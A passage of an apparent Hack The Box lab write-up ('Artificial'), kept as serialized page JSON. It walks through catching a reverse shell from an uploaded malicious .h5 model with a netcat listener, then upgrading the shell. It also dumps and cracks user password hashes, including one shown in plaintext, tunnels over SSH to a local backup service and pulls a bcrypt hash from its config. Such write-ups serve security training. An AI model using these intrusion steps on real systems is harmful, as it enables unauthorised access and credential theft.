files)\n",{"type":24,"tag":297,"props":1098,"children":1099},{"class":299,"line":647},[1100],{"type":24,"tag":297,"props":1101,"children":1102},{"style":751},[1103],{"type":34,"value":1104},"# artificial : the name of the image to run\n",{"type":24,"tag":25,"props":1106,"children":1108},{"src":1107},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F11.jpg",[],{"type":24,"tag":25,"props":1110,"children":1112},{"src":1111},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":1114,"children":1115},{},[1116,1118,1124],{"type":34,"value":1117},"Now let's upload this ",{"type":24,"tag":66,"props":1119,"children":1121},{"className":1120},[],[1122],{"type":34,"value":1123},"exploit.h5",{"type":34,"value":1125}," model to the target.",{"type":24,"tag":287,"props":1127,"children":1129},{"code":1128,"language":725,"meta":7,"className":726,"style":7},"nc -nvlp 6666\n",[1130],{"type":24,"tag":66,"props":1131,"children":1132},{"__ignoreMap":7},[1133],{"type":24,"tag":297,"props":1134,"children":1135},{"class":299,"line":300},[1136,1141,1146],{"type":24,"tag":297,"props":1137,"children":1138},{"style":344},[1139],{"type":34,"value":1140},"nc",{"type":24,"tag":297,"props":1142,"children":1143},{"style":783},[1144],{"type":34,"value":1145}," -nvlp",{"type":24,"tag":297,"props":1147,"children":1148},{"style":552},[1149],{"type":34,"value":1150}," 6666\n",{"type":24,"tag":25,"props":1152,"children":1154},{"src":1153},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F13.gif",[],{"type":24,"tag":30,"props":1156,"children":1157},{},[1158],{"type":34,"value":1159},"And we got a shell. Let's immediately turn this shell into an interactive shell.",{"type":24,"tag":287,"props":1161,"children":1163},{"code":1162,"language":725,"meta":7,"className":726,"style":7},"python3 -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n\nCtrl-Z\n\n# In Kali\nstty raw -echo ; fg\n",[1164],{"type":24,"tag":66,"props":1165,"children":1166},{"__ignoreMap":7},[1167,1185,1192,1200,1207,1215],{"type":24,"tag":297,"props":1168,"children":1169},{"class":299,"line":300},[1170,1175,1180],{"type":24,"tag":297,"props":1171,"children":1172},{"style":344},[1173],{"type":34,"value":1174},"python3",{"type":24,"tag":297,"props":1176,"children":1177},{"style":783},[1178],{"type":34,"value":1179}," -c",{"type":24,"tag":297,"props":1181,"children":1182},{"style":405},[1183],{"type":34,"value":1184}," 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n",{"type":24,"tag":297,"props":1186,"children":1187},{"class":299,"line":326},[1188],{"type":24,"tag":297,"props":1189,"children":1190},{"emptyLinePlaceholder":14},[1191],{"type":34,"value":332},{"type":24,"tag":297,"props":1193,"children":1194},{"class":299,"line":335},[1195],{"type":24,"tag":297,"props":1196,"children":1197},{"style":344},[1198],{"type":34,"value":1199},"Ctrl-Z\n",{"type":24,"tag":297,"props":1201,"children":1202},{"class":299,"line":367},[1203],{"type":24,"tag":297,"props":1204,"children":1205},{"emptyLinePlaceholder":14},[1206],{"type":34,"value":332},{"type":24,"tag":297,"props":1208,"children":1209},{"class":299,"line":381},[1210],{"type":24,"tag":297,"props":1211,"children":1212},{"style":751},[1213],{"type":34,"value":1214},"# In Kali\n",{"type":24,"tag":297,"props":1216,"children":1217},{"class":299,"line":416},[1218,1223,1228,1233,1238],{"type":24,"tag":297,"props":1219,"children":1220},{"style":344},[1221],{"type":34,"value":1222},"stty",{"type":24,"tag":297,"props":1224,"children":1225},{"style":405},[1226],{"type":34,"value":1227}," raw",{"type":24,"tag":297,"props":1229,"children":1230},{"style":783},[1231],{"type":34,"value":1232}," -echo",{"type":24,"tag":297,"props":1234,"children":1235},{"style":350},[1236],{"type":34,"value":1237}," ;",{"type":24,"tag":297,"props":1239,"children":1240},{"style":1046},[1241],{"type":34,"value":1242}," fg\n",{"type":24,"tag":25,"props":1244,"children":1246},{"src":1245},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F14.jpg",[],{"type":24,"tag":46,"props":1248,"children":1250},{"id":1249},"privilege-escalation",[1251],{"type":34,"value":1252},"Privilege Escalation",{"type":24,"tag":1254,"props":1255,"children":1257},"h3",{"id":1256},"app-gael",[1258],{"type":34,"value":1259},"app ➤ gael",{"type":24,"tag":30,"props":1261,"children":1262},{},[1263,1265,1271],{"type":34,"value":1264},"When we browse our directory, we find a database file in ",{"type":24,"tag":66,"props":1266,"children":1268},{"className":1267},[],[1269],{"type":34,"value":1270},"instance",{"type":34,"value":392},{"type":24,"tag":25,"props":1273,"children":1275},{"src":1274},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F15.jpg",[],{"type":24,"tag":30,"props":1277,"children":1278},{},[1279,1281,1287],{"type":34,"value":1280},"Let's examine this file with ",{"type":24,"tag":66,"props":1282,"children":1284},{"className":1283},[],[1285],{"type":34,"value":1286},"sqlite3",{"type":34,"value":392},{"type":24,"tag":287,"props":1289,"children":1291},{"code":1290},".tables\n\n.headers on\n.mode column\nSELECT * FROM user;\n",[1292],{"type":24,"tag":66,"props":1293,"children":1294},{"__ignoreMap":7},[1295],{"type":34,"value":1290},{"type":24,"tag":25,"props":1297,"children":1299},{"src":1298},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":1301,"children":1302},{},[1303],{"type":34,"value":1304},"When we check from here, we get the users and their hashed passwords.",{"type":24,"tag":25,"props":1306,"children":1308},{"src":1307},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F17.jpg",[],{"type":24,"tag":30,"props":1310,"children":1311},{},[1312,1314,1320,1322,1329,1331,1337,1339,1345],{"type":34,"value":1313},"When we crack the hash for the ",{"type":24,"tag":66,"props":1315,"children":1317},{"className":1316,"id":86,"style":87},[85],[1318],{"type":34,"value":1319},"gael",{"type":34,"value":1321}," user via ",{"type":24,"tag":37,"props":1323,"children":1326},{"href":1324,"rel":1325},"https:\u002F\u002Fcrackstation.net\u002F",[41],[1327],{"type":34,"value":1328},"crackstation",{"type":34,"value":1330},", we find the password as ",{"type":24,"tag":66,"props":1332,"children":1334},{"className":1333,"id":86,"style":87},[85],[1335],{"type":34,"value":1336},"mattp005numbertwo",{"type":34,"value":1338},". Let's try to connect via ",{"type":24,"tag":66,"props":1340,"children":1342},{"className":1341},[],[1343],{"type":34,"value":1344},"ssh",{"type":34,"value":1346}," with this information.",{"type":24,"tag":25,"props":1348,"children":1350},{"src":1349},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F18.jpg",[],{"type":24,"tag":30,"props":1352,"children":1353},{},[1354,1356,1361],{"type":34,"value":1355},"And yes, we are inside the system as ",{"type":24,"tag":66,"props":1357,"children":1359},{"className":1358},[],[1360],{"type":34,"value":1319},{"type":34,"value":392},{"type":24,"tag":1254,"props":1363,"children":1365},{"id":1364},"gael-root",[1366],{"type":34,"value":1367},"gael ➤ root",{"type":24,"tag":30,"props":1369,"children":1370},{},[1371,1373,1380],{"type":34,"value":1372},"Now let's upload ",{"type":24,"tag":37,"props":1374,"children":1377},{"href":1375,"rel":1376},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Ftree\u002Fmaster\u002FlinPEAS",[41],[1378],{"type":34,"value":1379},"LinPeas.sh",{"type":34,"value":1381}," to the target to find ways to escalate our privileges.",{"type":24,"tag":25,"props":1383,"children":1385},{"src":1384},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F19.jpg",[],{"type":24,"tag":25,"props":1387,"children":1389},{"src":1388},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F20.jpg",[],{"type":24,"tag":30,"props":1391,"children":1392},{},[1393],{"type":34,"value":1394},"As a result of our investigations, we have caught some important things.",{"type":24,"tag":120,"props":1396,"children":1397},{},[1398,1419],{"type":24,"tag":124,"props":1399,"children":1400},{},[1401,1403,1409,1411,1417],{"type":34,"value":1402},"A software named ",{"type":24,"tag":66,"props":1404,"children":1406},{"className":1405},[],[1407],{"type":34,"value":1408},"backrest",{"type":34,"value":1410}," in the ",{"type":24,"tag":66,"props":1412,"children":1414},{"className":1413},[],[1415],{"type":34,"value":1416},"\u002Fopt",{"type":34,"value":1418}," folder.",{"type":24,"tag":124,"props":1420,"children":1421},{},[1422,1424],{"type":34,"value":1423},"Two ports that can only be accessed locally.",{"type":24,"tag":25,"props":1425,"children":1427},{"src":1426},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F21.jpg",[],{"type":24,"tag":25,"props":1429,"children":1431},{"src":1430},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F22.jpg",[],{"type":24,"tag":30,"props":1433,"children":1434},{},[1435],{"type":34,"value":1436},"When we examine this backrest software, we understand that it is a backup service. Now let's look at these ports that can only be accessed locally.",{"type":24,"tag":30,"props":1438,"children":1439},{},[1440,1442,1447],{"type":34,"value":1441},"Since we know Gael's user information, we can tunnel with ",{"type":24,"tag":66,"props":1443,"children":1445},{"className":1444},[],[1446],{"type":34,"value":1344},{"type":34,"value":392},{"type":24,"tag":287,"props":1449,"children":1451},{"code":1450,"language":725,"meta":7,"className":726,"style":7},"ssh -L 9898:127.0.0.1:9898 gael@artificial.htb\n# Tunnels port 9898 on the local machine to the address 127.0.0.1:9898 inside the remote (artificial.htb)\n# -L local_port:remote_host:remote_port  -> local 9898 → 127.0.0.1:9898 inside the remote\n",[1452],{"type":24,"tag":66,"props":1453,"children":1454},{"__ignoreMap":7},[1455,1477,1485],{"type":24,"tag":297,"props":1456,"children":1457},{"class":299,"line":300},[1458,1462,1467,1472],{"type":24,"tag":297,"props":1459,"children":1460},{"style":344},[1461],{"type":34,"value":1344},{"type":24,"tag":297,"props":1463,"children":1464},{"style":783},[1465],{"type":34,"value":1466}," -L",{"type":24,"tag":297,"props":1468,"children":1469},{"style":405},[1470],{"type":34,"value":1471}," 9898:127.0.0.1:9898",{"type":24,"tag":297,"props":1473,"children":1474},{"style":405},[1475],{"type":34,"value":1476}," gael@artificial.htb\n",{"type":24,"tag":297,"props":1478,"children":1479},{"class":299,"line":326},[1480],{"type":24,"tag":297,"props":1481,"children":1482},{"style":751},[1483],{"type":34,"value":1484},"# Tunnels port 9898 on the local machine to the address 127.0.0.1:9898 inside the remote (artificial.htb)\n",{"type":24,"tag":297,"props":1486,"children":1487},{"class":299,"line":335},[1488],{"type":24,"tag":297,"props":1489,"children":1490},{"style":751},[1491],{"type":34,"value":1492},"# -L local_port:remote_host:remote_port  -> local 9898 → 127.0.0.1:9898 inside the remote\n",{"type":24,"tag":30,"props":1494,"children":1495},{},[1496,1498,1504],{"type":34,"value":1497},"Now let's take a look at this port with ",{"type":24,"tag":66,"props":1499,"children":1501},{"className":1500},[],[1502],{"type":34,"value":1503},"nmap",{"type":34,"value":392},{"type":24,"tag":25,"props":1506,"children":1508},{"src":1507},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F23.jpg",[],{"type":24,"tag":30,"props":1510,"children":1511},{},[1512,1514,1520],{"type":34,"value":1513},"We see that we have an ",{"type":24,"tag":66,"props":1515,"children":1517},{"className":1516},[],[1518],{"type":34,"value":1519},"http",{"type":34,"value":1521}," service, let's check it.",{"type":24,"tag":25,"props":1523,"children":1525},{"src":1524},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F24.jpg",[],{"type":24,"tag":30,"props":1527,"children":1528},{},[1529,1531,1537,1539,1545],{"type":34,"value":1530},"And yes, we are faced with the ",{"type":24,"tag":66,"props":1532,"children":1534},{"className":1533},[],[1535],{"type":34,"value":1536},"backrast",{"type":34,"value":1538}," service interface and we see that its version is ",{"type":24,"tag":66,"props":1540,"children":1542},{"className":1541},[],[1543],{"type":34,"value":1544},"1.7.2",{"type":34,"value":1546},". However, when we search for an exploit for this version, we cannot get anything. We need to proceed from a different place.",{"type":24,"tag":30,"props":1548,"children":1549},{},[1550],{"type":34,"value":1551},"First of all, I tried the information we found from the database file here, but unfortunately I was not successful (including admin:12345) 😁.",{"type":24,"tag":30,"props":1553,"children":1554},{},[1555,1557,1563],{"type":34,"value":1556},"So let's do a search with ",{"type":24,"tag":66,"props":1558,"children":1560},{"className":1559},[],[1561],{"type":34,"value":1562},".\u002Flinpeas.sh | grep \"backrest\"",{"type":34,"value":1564}," to see what else we can find and see what else we will find for backrest.",{"type":24,"tag":25,"props":1566,"children":1568},{"src":1567},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F25.jpg",[],{"type":24,"tag":30,"props":1570,"children":1571},{},[1572,1574,1580,1581,1587,1589,1595,1597,1603],{"type":34,"value":1573},"In the output, our attention is drawn to the ",{"type":24,"tag":66,"props":1575,"children":1577},{"className":1576},[],[1578],{"type":34,"value":1579},"\u002Fopt\u002Fbackrest\u002F",{"type":34,"value":73},{"type":24,"tag":66,"props":1582,"children":1584},{"className":1583,"id":86,"style":87},[85],[1585],{"type":34,"value":1586},"\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz",{"type":34,"value":1588}," backup file. When we examine ",{"type":24,"tag":66,"props":1590,"children":1592},{"className":1591},[],[1593],{"type":34,"value":1594},"\u002Fopt\u002Fbackrest",{"type":34,"value":1596},", we see that we do not have permission for it when we try to look at the configurations from the ",{"type":24,"tag":66,"props":1598,"children":1600},{"className":1599},[],[1601],{"type":34,"value":1602},"\u002Fopt\u002Fbackrest\u002F.config\u002Fbackrest",{"type":34,"value":1604}," directory.",{"type":24,"tag":25,"props":1606,"children":1608},{"src":1607},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F26.jpg",[],{"type":24,"tag":30,"props":1610,"children":1611},{},[1612],{"type":34,"value":1613},"We can't get anything from here.",{"type":24,"tag":30,"props":1615,"children":1616},{},[1617,1619,1624,1626,1632,1634,1640,1642,1647,1649,1654],{"type":34,"value":1618},"Now let's check the ",{"type":24,"tag":66,"props":1620,"children":1622},{"className":1621},[],[1623],{"type":34,"value":1586},{"type":34,"value":1625}," backup file. We see that we have read permission for the ",{"type":24,"tag":66,"props":1627,"children":1629},{"className":1628},[],[1630],{"type":34,"value":1631},"sysadm",{"type":34,"value":1633}," group in this file. When we check with ",{"type":24,"tag":66,"props":1635,"children":1637},{"className":1636},[],[1638],{"type":34,"value":1639},"id",{"type":34,"value":1641},", the ",{"type":24,"tag":66,"props":1643,"children":1645},{"className":1644},[],[1646],{"type":34,"value":1319},{"type":34,"value":1648}," user is in the ",{"type":24,"tag":66,"props":1650,"children":1652},{"className":1651},[],[1653],{"type":34,"value":1631},{"type":34,"value":1655}," group.",{"type":24,"tag":25,"props":1657,"children":1659},{"src":1658},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F27.jpg",[],{"type":24,"tag":25,"props":1661,"children":1663},{"src":1662},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F28.jpg",[],{"type":24,"tag":30,"props":1665,"children":1666},{},[1667,1669,1675],{"type":34,"value":1668},"So let's download this file to our own device with ",{"type":24,"tag":66,"props":1670,"children":1672},{"className":1671},[],[1673],{"type":34,"value":1674},"scp",{"type":34,"value":1676}," and examine it.",{"type":24,"tag":287,"props":1678,"children":1680},{"code":1679,"language":725,"meta":7,"className":726,"style":7},"scp gael@10.10.11.74:\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz .\ntar -xf backrest_backup.tar.gz\ncd backrest\ncd .config\ncd backrest\nmousepad config.json\n",[1681],{"type":24,"tag":66,"props":1682,"children":1683},{"__ignoreMap":7},[1684,1700,1718,1731,1743,1754],{"type":24,"tag":297,"props":1685,"children":1686},{"class":299,"line":300},[1687,1691,1696],{"type":24,"tag":297,"props":1688,"children":1689},{"style":344},[1690],{"type":34,"value":1674},{"type":24,"tag":297,"props":1692,"children":1693},{"style":405},[1694],{"type":34,"value":1695}," gael@10.10.11.74:\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz",{"type":24,"tag":297,"props":1697,"children":1698},{"style":405},[1699],{"type":34,"value":962},{"type":24,"tag":297,"props":1701,"children":1702},{"class":299,"line":326},[1703,1708,1713],{"type":24,"tag":297,"props":1704,"children":1705},{"style":344},[1706],{"type":34,"value":1707},"tar",{"type":24,"tag":297,"props":1709,"children":1710},{"style":783},[1711],{"type":34,"value":1712}," -xf",{"type":24,"tag":297,"props":1714,"children":1715},{"style":405},[1716],{"type":34,"value":1717}," backrest_backup.tar.gz\n",{"type":24,"tag":297,"props":1719,"children":1720},{"class":299,"line":335},[1721,1726],{"type":24,"tag":297,"props":1722,"children":1723},{"style":1046},[1724],{"type":34,"value":1725},"cd",{"type":24,"tag":297,"props":1727,"children":1728},{"style":405},[1729],{"type":34,"value":1730}," backrest\n",{"type":24,"tag":297,"props":1732,"children":1733},{"class":299,"line":367},[1734,1738],{"type":24,"tag":297,"props":1735,"children":1736},{"style":1046},[1737],{"type":34,"value":1725},{"type":24,"tag":297,"props":1739,"children":1740},{"style":405},[1741],{"type":34,"value":1742}," .config\n",{"type":24,"tag":297,"props":1744,"children":1745},{"class":299,"line":381},[1746,1750],{"type":24,"tag":297,"props":1747,"children":1748},{"style":1046},[1749],{"type":34,"value":1725},{"type":24,"tag":297,"props":1751,"children":1752},{"style":405},[1753],{"type":34,"value":1730},{"type":24,"tag":297,"props":1755,"children":1756},{"class":299,"line":416},[1757,1762],{"type":24,"tag":297,"props":1758,"children":1759},{"style":344},[1760],{"type":34,"value":1761},"mousepad",{"type":24,"tag":297,"props":1763,"children":1764},{"style":405},[1765],{"type":34,"value":1766}," config.json\n",{"type":24,"tag":25,"props":1768,"children":1770},{"src":1769},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F29.jpg",[],{"type":24,"tag":25,"props":1772,"children":1774},{"src":1773},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F30.jpg",[],{"type":24,"tag":25,"props":1776,"children":1778},{"src":1777},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F31.jpg",[],{"type":24,"tag":30,"props":1780,"children":1781},{},[1782,1784,1790,1792,1798,1799,1805],{"type":34,"value":1783},"And we were able to access ",{"type":24,"tag":66,"props":1785,"children":1787},{"className":1786,"id":86,"style":87},[85],[1788],{"type":34,"value":1789},"config.json",{"type":34,"value":1791}," from this backup file and we see the ",{"type":24,"tag":66,"props":1793,"children":1795},{"className":1794},[],[1796],{"type":34,"value":1797},"name",{"type":34,"value":73},{"type":24,"tag":66,"props":1800,"children":1802},{"className":1801},[],[1803],{"type":34,"value":1804},"password",{"type":34,"value":1806}," parts here.",{"type":24,"tag":287,"props":1808,"children":1812},{"code":1809,"language":1810,"meta":7,"className":1811,"style":7},"{\n  \"modno\": 2,\n  \"version\": 4,\n  \"instance\": \"Artificial\",\n  \"auth\": {\n    \"disabled\": false,\n    \"users\": [\n      {\n        \"name\": \"backrest_root\",\n        \"passwordBcrypt\": \"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\",\n      },\n    ],\n  },\n}\n","json","language-json shiki shiki-themes catppuccin-latte one-dark-pro",[1813],{"type":24,"tag":66,"props":1814,"children":1815},{"__ignoreMap":7},[1816,1824,1859,1888,1916,1941,1971,1996,2004,2033,2062,2070,2078,2087],{"type":24,"tag":297,"props":1817,"children":1818},{"class":299,"line":300},[1819],{"type":24,"tag":297,"props":1820,"children":1821},{"style":350},[1822],{"type":34,"value":1823},"{\n",{"type":24,"tag":297,"props":1825,"children":1826},{"class":299,"line":326},[1827,1833,1839,1844,1849,1854],{"type":24,"tag":297,"props":1828,"children":1830},{"style":1829},"--shiki-default:#7C7F93;--shiki-dark:#E06C75",[1831],{"type":34,"value":1832},"  \"",{"type":24,"tag":297,"props":1834,"children":1836},{"style":1835},"--shiki-default:#1E66F5;--shiki-dark:#E06C75",[1837],{"type":34,"value":1838},"modno",{"type":24,"tag":297,"props":1840,"children":1841},{"style":1829},[1842],{"type":34,"value":1843},"\"",{"type":24,"tag":297,"props":1845,"children":1846},{"style":350},[1847],{"type":34,"value":1848},":",{"type":24,"tag":297,"props":1850,"children":1851},{"style":552},[1852],{"type":34,"value":1853}," 2",{"type":24,"tag":297,"props":1855,"children":1856},{"style":350},[1857],{"type":34,"value":1858},",\n",{"type":24,"tag":297,"props":1860,"children":1861},{"class":299,"line":335},[1862,1866,1871,1875,1879,1884],{"type":24,"tag":297,"props":1863,"children":1864},{"style":1829},[1865],{"type":34,"value":1832},{"type":24,"tag":297,"props":1867,"children":1868},{"style":1835},[1869],{"type":34,"value":1870},"version",{"type":24,"tag":297,"props":1872,"children":1873},{"style":1829},[1874],{"type":34,"value":1843},{"type":24,"tag":297,"props":1876,"children":1877},{"style":350},[1878],{"type":34,"value":1848},{"type":24,"tag":297,"props":1880,"children":1881},{"style":552},[1882],{"type":34,"value":1883}," 4",{"type":24,"tag":297,"props":1885,"children":1886},{"style":350},[1887],{"type":34,"value":1858},{"type":24,"tag":297,"props":1889,"children":1890},{"class":299,"line":367},[1891,1895,1899,1903,1907,1912],{"type":24,"tag":297,"props":1892,"children":1893},{"style":1829},[1894],{"type":34,"value":1832},{"type":24,"tag":297,"props":1896,"children":1897},{"style":1835},[1898],{"type":34,"value":1270},{"type":24,"tag":297,"props":1900,"children":1901},{"style":1829},[1902],{"type":34,"value":1843},{"type":24,"tag":297,"props":1904,"children":1905},{"style":350},[1906],{"type":34,"value":1848},{"type":24,"tag":297,"props":1908,"children":1909},{"style":405},[1910],{"type":34,"value":1911}," \"Artificial\"",{"type":24,"tag":297,"props":1913,"children":1914},{"style":350},[1915],{"type":34,"value":1858},{"type":24,"tag":297,"props":1917,"children":1918},{"class":299,"line":381},[1919,1923,1928,1932,1936],{"type":24,"tag":297,"props":1920,"children":1921},{"style":1829},[1922],{"type":34,"value":1832},{"type":24,"tag":297,"props":1924,"children":1925},{"style":1835},[1926],{"type":34,"value":1927},"auth",{"type":24,"tag":297,"props":1929,"children":1930},{"style":1829},[1931],{"type":34,"value":1843},{"type":24,"tag":297,"props":1933,"children":1934},{"style":350},[1935],{"type":34,"value":1848},{"type":24,"tag":297,"props":1937,"children":1938},{"style":350},[1939],{"type":34,"value":1940}," {\n",{"type":24,"tag":297,"props":1942,"children":1943},{"class":299,"line":416},[1944,1949,1954,1958,1962,1967],{"type":24,"tag":297,"props":1945,"children":1946},{"style":1829},[1947],{"type":34,"value":1948},"    \"",{"type":24,"tag":297,"props":1950,"children":1951},{"style":1835},[1952],{"type":34,"value":1953},"disabled",{"type":24,"tag":297,"props":1955,"children":1956},{"style":1829},[1957],{"type":34,"value":1843},{"type":24,"tag":297,"props":1959,"children":1960},{"style":350},[1961],{"type":34,"value":1848},{"type":24,"tag":297,"props":1963,"children":1964},{"style":552},[1965],{"type":34,"value":1966}," false",{"type":24,"tag":297,"props":1968,"children":1969},{"style":350},[1970],{"type":34,"value":1858},{"type":24,"tag":297,"props":1972,"children":1973},{"class":299,"line":430},[1974,1978,1983,1987,1991],{"type":24,"tag":297,"props":1975,"children":1976},{"style":1829},[1977],{"type":34,"value":1948},{"type":24,"tag":297,"props":1979,"children":1980},{"style":1835},[1981],{"type":34,"value":1982},"users",{"type":24,"tag":297,"props":1984,"children":1985},{"style":1829},[1986],{"type":34,"value":1843},{"type":24,"tag":297,"props":1988,"children":1989},{"style":350},[1990],{"type":34,"value":1848},{"type":24,"tag":297,"props":1992,"children":1993},{"style":350},[1994],{"type":34,"value":1995}," [\n",{"type":24,"tag":297,"props":1997,"children":1998},{"class":299,"line":438},[1999],{"type":24,"tag":297,"props":2000,"children":2001},{"style":350},[2002],{"type":34,"value":2003},"      {\n",{"type":24,"tag":297,"props":2005,"children":2006},{"class":299,"line":481},[2007,2012,2016,2020,2024,2029],{"type":24,"tag":297,"props":2008,"children":2009},{"style":1829},[2010],{"type":34,"value":2011},"        \"",{"type":24,"tag":297,"props":2013,"children":2014},{"style":1835},[2015],{"type":34,"value":1797},{"type":24,"tag":297,"props":2017,"children":2018},{"style":1829},[2019],{"type":34,"value":1843},{"type":24,"tag":297,"props":2021,"children":2022},{"style":350},[2023],{"type":34,"value":1848},{"type":24,"tag":297,"props":2025,"children":2026},{"style":405},[2027],{"type":34,"value":2028}," \"backrest_root\"",{"type":24,"tag":297,"props":2030,"children":2031},{"style":350},[2032],{"type":34,"value":1858},{"type":24,"tag":297,"props":2034,"children":2035},{"class":299,"line":563},[2036,2040,2045,2049,2053,2058],{"type":24,"tag":297,"props":2037,"children":2038},{"style":1829},[2039],{"type":34,"value":2011},{"type":24,"tag":297,"props":2041,"children":2042},{"style":1835},[2043],{"type":34,"value":2044},"passwordBcrypt",{"type":24,"tag":297,"props":2046,"children":2047},{"style":1829},[2048],{"type":34,"value":1843},{"type":24,"tag":297,"props":2050,"children":2051},{"style":350},[2052],{"type":34,"value":1848},{"type":24,"tag":297,"props":2054,"children":2055},{"style":405},[2056],{"type":34,"value":2057}," \"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\"",{"type":24,"tag":297,"props":2059,"children":2060},{"style":350},[2061],{"type":34,"value":1858},{"type":24,"tag":297,"props":2063,"children":2064},{"class":299,"line":626},[2065],{"type":24,"tag":297,"props":2066,"children":2067},{"style":350},[2068],{"type":34,"value":2069},"      },\n",{"type":24,"tag":297,"props":2071,"children":2072},{"class":299,"line":647},[2073],{"type":24,"tag":297,"props":2074,"children":2075},{"style":350},[2076],{"type":34,"value":2077},"    ],\n",{"type":24,"tag":297,"props":2079,"children":2081},{"class":299,"line":2080},13,[2082],{"type":24,"tag":297,"props":2083,"children":2084},{"style":350},[2085],{"type":34,"value":2086},"  },\n",{"type":24,"tag":297,"props":2088,"children":2090},{"class":299,"line":2089},14,[2091],{"type":24,"tag":297,"props":2092,"children":2093},{"style":350},[2094],{"type":34,"value":2095},"}\n",{"type":24,"tag":30,"props":2097,"children":2098},{},[2099,2101,2108],{"type":34,"value":2100},"Now we understand that this password is hashed, let's check ",{"type":24,"tag":37,"props":2102,"children":2105},{"href":2103,"rel":2104},"https:\u002F\u002Fhashes.com\u002Fen\u002Ftools\u002Fhash_identifier",[41],[2106],{"type":34,"value":2107},"this site",{"type":34,"value":2109}," to find out what type of hash they use.",{"type":24,"tag":25,"props":2111,"children":2113},{"src":2112},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F32.jpg",[],{"type":24,"tag":25,"props":2115,"children":2117},{"src":2116},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F33.jpg",[],{"type":24,"tag":25,"props":2119,"children":2121},{"src":2120},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F34.jpg",[],{"type":24,"tag":30,"props":2123,"children":2124},{},[2125,2127,2133],{"type":34,"value":2126},"From here we learn that it is hashed with ",{"type":24,"tag":66,"props":2128,"children":2130},{"className":2129},[],[2131],{"type":34,"value":2132},"bcrypt",{"type":34,"value":2134}," and we get the hash. Now let's crack it.",{"type":24,"tag":287,"props":2136,"children":2138},{"code":2137,"language":725,"meta":7,"className":726,"style":7},"echo '$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR\u002FACMMkSsspbRutYP58EBZz\u002F0QO' > hash.txt\njohn hash.txt\n",[2139],{"type":24,"tag":66,"props":2140,"children":2141},{"__ignoreMap":7},[2142,2166],{"type":24,"tag":297,"props":2143,"children":2144},{"class":299,"line":300},[2145,2150,2155,2161],{"type":24,"tag":297,"props":2146,"children":2147},{"style":1046},[2148],{"type":34,"value":2149},"echo",{"type":24,"tag":297,"props":2151,"children":2152},{"style":405},[2153],{"type":34,"value":2154}," '$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR\u002FACMMkSsspbRutYP58EBZz\u002F0QO'",{"type":24,"tag":297,"props":2156,"children":2158},{"style":2157},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[2159],{"type":34,"value":2160}," >",{"type":24,"tag":297,"props":2162,"children":2163},{"style":405},[2164],{"type":34,"value":2165}," 